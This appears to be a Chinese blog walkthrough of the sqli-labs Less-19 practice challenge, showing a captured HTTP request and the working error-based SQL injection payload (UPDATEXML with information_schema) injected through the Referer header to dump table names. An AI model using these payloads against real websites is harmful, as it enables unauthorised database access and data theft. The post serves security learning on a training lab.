zoukankan      html  css  js  c++  java
  • Less19

    Less-19

    1. 有了18题目的经验,这道题就比较简单
    2. 直接bp抓包发送
    POST /Less-19/ HTTP/1.1
    Host: sql.alienwares.top
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Origin: https://sql.alienwares.top
    Connection: close
    Referer: asa'ddd#
    Upgrade-Insecure-Requests: 1
    
    uname=admin&passwd=admin&submit=Submit
    View Code
    You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1
    • 返回mysql报错的结果
    • mysql 语句应该为 
    insert into table_name values ('a','b')
    View Code
    • 开始sql注入语句构造
    sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE() 
    concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())
    #记得加(
    select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1)
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP')
    
    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP')
    'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#
    View Code

    sql注入大功告成

  • 相关阅读:
    机器学习 -- 用户画像
    机器学习 -- 分类
    机器学习 -- 聚类
    机器学习 -- 回归
    数据分析 -- 流程
    Nginx + Tomcat7 + redis session一致性问题
    机器学习 -- 信息论
    机器学习 -- 统计与分布
    ElasticSearch 学习一: 基本命令
    问题17:如何将多个小字符串拼接成一个大的字符串
  • 原文地址:https://www.cnblogs.com/hackering/p/14273474.html
Copyright © 2011-2022 走看看